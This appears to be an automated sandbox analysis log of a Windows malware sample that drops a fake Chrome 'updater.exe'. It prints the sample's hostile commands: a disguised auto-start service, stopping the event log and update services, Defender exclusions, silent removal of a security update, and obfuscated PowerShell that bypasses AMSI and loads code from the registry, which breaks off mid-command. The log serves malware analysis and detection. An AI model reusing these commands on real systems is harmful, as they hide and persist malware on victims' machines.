          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll (12 identical entries)
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll (4 identical entries)
          Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: xmllite.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
          Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll (4 identical entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
          Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
          Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\dllhost.exe | Section loaded: pdh.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll (2 identical entries)
          Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: egFMhHSlmf.exe | Static PE information: Image base 0x140000000 > 0x60000000
          Source: egFMhHSlmf.exe | Static file information: File size 5536856 > 1048576
          Source: egFMhHSlmf.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x528e00
          Source: egFMhHSlmf.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp
          Source: egFMhHSlmf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: egFMhHSlmf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: egFMhHSlmf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: egFMhHSlmf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: egFMhHSlmf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Obj
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvo
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+
          Source: unknown | Process created (identical entry recorded twice; the second copy is collapsed): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 